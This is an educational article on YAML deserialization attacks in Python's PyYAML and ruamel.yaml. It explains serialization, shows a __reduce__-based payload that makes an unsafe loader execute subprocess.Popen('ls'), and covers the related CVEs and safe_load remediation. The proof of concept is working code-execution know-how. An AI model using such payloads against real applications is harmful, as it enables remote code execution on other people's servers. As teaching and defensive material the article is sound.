Understanding YAML Deserialization Vulnerabilities and Mitigation
Chapter 1: Introduction to YAML Deserialization
Deserialization attacks are a common class of vulnerability in languages such as Java, Python, and Ruby. They arise when an application deserializes a data stream without adequate validation, which can let an attacker execute arbitrary code remotely. In this article, we explore one such technique in the context of YAML.
Before we delve into YAML deserialization, let's clarify the concepts of serialization and deserialization.
Section 1.1: What is Serialization?
Consider an online game where your character has various attributes such as username, avatar, clothing, rank, and weapons. How are these attributes communicated and stored on the server? The answer lies in serialization.
Defining Serialization
Serialization is the process of converting an in-memory object into a byte stream or other flat representation. This simplified form of the object can be transmitted over a network or saved to files, databases, and other storage.
Deserialization, the counterpart to serialization, is the process of transforming these byte streams back into their original object form.
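To make the round trip concrete, here is a minimal sketch that uses Python's standard json module as a stand-in serialization format (YAML is covered later). The character's attribute names and values are hypothetical, loosely based on the game example above.

```python
import json

# Hypothetical game character; attribute names are illustrative only.
character = {
    "username": "player1",
    "avatar": "knight.png",
    "rank": 7,
    "weapons": ["sword", "bow"],
}

# Serialization: in-memory object -> flat string that can be sent or stored.
serialized = json.dumps(character)
print(serialized)

# Deserialization: flat string -> equivalent Python object.
restored = json.loads(serialized)
print(restored == character)  # True
```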
Potential Vulnerabilities
A vulnerability arises when an application, such as a web server, accepts a serialized value and deserializes it without validating it first. If users can tamper with that value, deserialization can produce unexpected behavior, up to and including running attacker-chosen code.
Section 1.2: What is YAML?
YAML, originally short for "Yet Another Markup Language" and now officially the recursive acronym "YAML Ain't Markup Language," is described by Wikipedia as "a human-readable data-serialization language." It is commonly used for configuration files and wherever data needs to be stored or transmitted. YAML uses Python-style indentation for nesting and also offers a compact flow style that uses [] for lists and {} for maps.
Unlike a programming language, YAML only describes data, and its syntax is flexible: the same structure can be written in indented block style or in compact flow style.
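The indented style and the compact [] / {} style describe the same data. A small check with PyYAML (a third-party package, assumed to be installed) parses one document in each style and compares the results:

```python
import yaml  # PyYAML (third-party, assumed installed)

# Block style: nesting expressed through indentation
block_style = """
name: Manish
skills:
  - programming
  - soft skills
"""

# Flow style: compact [] for lists and {} for maps
flow_style = "{name: Manish, skills: [programming, soft skills]}"

block_data = yaml.safe_load(block_style)
flow_data = yaml.safe_load(flow_style)
print(block_data == flow_data)  # True
```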
Example of YAML Serialization
Consider the following data, written as a Python dictionary before serialization:
{
    'name': 'Manish',
    'age': 12,
    'skills': ['programming', 'soft skills']
}
Upon serialization, it would appear as:
name: Manish
age: 12
skills:
- programming
- soft skills
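The serialized form above can be reproduced with PyYAML's safe_dump() (PyYAML assumed installed). One detail worth knowing: PyYAML sorts mapping keys alphabetically by default, so this sketch passes sort_keys=False (available since PyYAML 5.1) to keep the original key order. Loading the text back with safe_load() restores the dictionary.

```python
import yaml  # PyYAML >= 5.1 for the sort_keys argument

data = {
    'name': 'Manish',
    'age': 12,
    'skills': ['programming', 'soft skills'],
}

# Serialize, keeping insertion order instead of sorting keys
text = yaml.safe_dump(data, sort_keys=False)
print(text)

# Deserialize back into a plain dict
print(yaml.safe_load(text) == data)  # True
```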
Understanding Vulnerabilities in YAML
This example is harmless on its own. Problems arise when deserialization does more than rebuild plain data: some loaders honor language-specific tags that tell them to create arbitrary objects or call functions. PyYAML and ruamel.yaml, two widely used Python libraries, are exposed to deserialization attacks when their unsafe loading functions are used on untrusted input.
Serialization Methods
PyYAML's serialization functions include:
- dump()
- dump_all()
- safe_dump()
- safe_dump_all()
PyYAML's deserialization functions include:
- load()
- load_all()
- full_load()
- full_load_all()
- safe_load()
- safe_load_all()
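The safe_ variants are the ones to prefer for untrusted data: safe_dump() only emits standard YAML types, and safe_load() only constructs them. The sketch below (PyYAML assumed installed; the Point class and the refuses() helper are hypothetical, written for this demo) shows dump() writing a Python-specific tag for an arbitrary object, safe_dump() refusing to, and safe_load() rejecting a document that carries a Python tag.

```python
import yaml  # PyYAML (third-party, assumed installed)


class Point:
    """Hypothetical user-defined class, used only for this demo."""

    def __init__(self, x, y):
        self.x = x
        self.y = y


def refuses(func, arg):
    """Hypothetical helper: True if func(arg) raises a PyYAML error."""
    try:
        func(arg)
    except yaml.YAMLError:
        return True
    return False


# dump() uses the full Dumper, which can describe arbitrary Python objects
dumped = yaml.dump(Point(1, 2))
print(dumped)  # a mapping tagged !!python/object:<module>.Point

# safe_dump() only represents standard types (str, int, list, dict, ...)
print(refuses(yaml.safe_dump, Point(1, 2)))  # True

# safe_load() rejects Python-specific tags instead of calling anything
tagged = "!!python/object/apply:builtins.len [[1, 2, 3]]"
print(refuses(yaml.safe_load, tagged))  # True
```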
Chapter 2: Creating Payloads
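To build a payload, we use Python's __reduce__() method, which tells a serializer how to rebuild an object: it returns a callable together with the arguments to call it with. This technique works against both PyYAML and ruamel.yaml when they load data with an unsafe loader. The example runs ls, so it assumes the backend runs on a Unix-like system.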
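import yaml
import subprocess

class Payload(object):
    def __reduce__(self):
        # Tells the serializer to rebuild this object by calling subprocess.Popen('ls')
        return (subprocess.Popen, ('ls',))

# yaml.dump() uses the full Dumper, so it can serialize arbitrary objects
serialized_data = yaml.dump(Payload())
print(serialized_data)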
The serialized output will be:
!!python/object/apply:subprocess.Popen
- ls
Payload Explanation
In this example, __reduce__() returns subprocess.Popen together with the argument tuple ('ls',). When an unsafe loader deserializes the resulting YAML, it calls subprocess.Popen('ls'), which spawns a new process running ls, listing the files in the current working directory.
If a vulnerable web application passes this payload to an unsafe loader, the data is not merely deserialized: the command is also executed. On PyYAML versions before 5.1, a plain load() call is enough:
deserialized_data = yaml.load(data)  # runs the command on PyYAML < 5.1
The command runs on the server and lists the contents of its current working directory, showing that an attacker-supplied command was executed.
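The call happens during loading, not afterwards. To see this without running a shell command, the sketch below swaps subprocess.Popen for the harmless built-in len (a substitution made purely for demonstration; HarmlessPayload is a hypothetical name) and loads the dumped text with yaml.Loader, an unsafe loader that recent PyYAML versions only use when you request it explicitly. PyYAML is assumed to be installed.

```python
import yaml  # PyYAML (third-party, assumed installed)


class HarmlessPayload:
    """Same shape as the Popen payload, but the callable is len()."""

    def __reduce__(self):
        # (callable, args): an unsafe loader will call len([1, 2, 3])
        return (len, ([1, 2, 3],))


text = yaml.dump(HarmlessPayload())
print(text)  # tagged !!python/object/apply:builtins.len

# yaml.Loader (like yaml.unsafe_load) honours python/object/apply tags,
# so deserializing the text invokes the callable and returns its result.
result = yaml.load(text, Loader=yaml.Loader)
print(result)  # 3
```

Replacing len with subprocess.Popen gives exactly the payload above, which is why the loader choice, not the payload, decides whether code runs.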
Remediation Strategies
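This vulnerability was assigned CVE-2017-18342 and was addressed in PyYAML 5.1, where load() stopped defaulting to the unsafe loader. Later releases fixed further code-execution issues in full_load() and FullLoader (CVE-2020-1747 and CVE-2020-14343, the latter fixed in 5.4), so it is advisable to run PyYAML 5.4 or newer (6.0 at the time of writing) and to load untrusted input with safe_load().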
Upgrading does not remove the risk entirely. Whether the payload can still run depends on the version in use and on how the application loads data: an application that explicitly opts into an unsafe loader remains exploitable.
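Note: To reproduce this, either use a PyYAML version older than 5.1 or request the unsafe loader explicitly. On newer versions, a bare load() call no longer uses the unsafe loader (on 6.0 it raises a TypeError when no Loader argument is given), so call yaml.load(data, Loader=yaml.Loader) or yaml.unsafe_load(data) instead.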
Conclusion
Deserialization vulnerabilities can have severe consequences, including remote code execution and privilege escalation. It is therefore crucial to deserialize untrusted YAML only with safe loaders such as safe_load(), and to validate incoming data before trusting it.
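As a minimal sketch of that advice, the hypothetical helper below parses untrusted text with safe_load() only and then checks the result against the structure it expects, rejecting anything else. The schema (the name/age/skills fields from the earlier example) and the names load_profile and InvalidProfile are assumptions for illustration; a real application would check its own fields. PyYAML is assumed to be installed.

```python
import yaml  # PyYAML (third-party, assumed installed)


class InvalidProfile(ValueError):
    """Raised when input is not a well-formed profile (hypothetical schema)."""


def load_profile(text):
    """Parse untrusted YAML safely, then validate its shape."""
    try:
        data = yaml.safe_load(text)  # never constructs arbitrary Python objects
    except yaml.YAMLError as exc:
        raise InvalidProfile(f"rejected YAML: {exc}") from exc

    if not isinstance(data, dict):
        raise InvalidProfile("expected a mapping at the top level")
    if set(data) != {"name", "age", "skills"}:
        raise InvalidProfile(f"unexpected keys: {sorted(map(str, data))}")
    if not isinstance(data["name"], str):
        raise InvalidProfile("name must be a string")
    # bool is a subclass of int in Python, so exclude it explicitly
    if not isinstance(data["age"], int) or isinstance(data["age"], bool):
        raise InvalidProfile("age must be an integer")
    if not (isinstance(data["skills"], list)
            and all(isinstance(s, str) for s in data["skills"])):
        raise InvalidProfile("skills must be a list of strings")
    return data


good = "name: Manish\nage: 12\nskills:\n- programming\n- soft skills\n"
print(load_profile(good)["name"])  # Manish

payload = "!!python/object/apply:subprocess.Popen\n- ls\n"
try:
    load_profile(payload)  # safe_load refuses the tag; nothing is executed
except InvalidProfile as exc:
    print("rejected:", exc)
```

Keeping parsing (safe_load) and validation (the explicit checks) as separate steps means a schema mistake cannot reopen the code-execution path.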